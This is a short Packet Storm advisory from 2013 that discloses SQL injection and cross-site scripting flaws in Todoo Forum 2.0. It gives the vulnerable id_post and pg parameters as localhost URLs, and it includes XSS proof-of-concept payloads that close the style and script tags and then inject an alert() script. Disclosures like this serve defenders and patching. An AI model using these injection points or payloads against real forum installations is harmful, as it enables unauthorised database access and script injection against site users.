Todoo Forum 2.0 Cross Site Scripting / SQL Injection

2013-04-14T00:00:00
ID PACKETSTORM:121290
Type packetstorm
Reporter Chiekh Bouchenafa
Modified 2013-04-14T00:00:00

Description

                                        
```
[+] SQL Injection

[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1

[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]

[+] Cross-site scripting

[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1

[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
```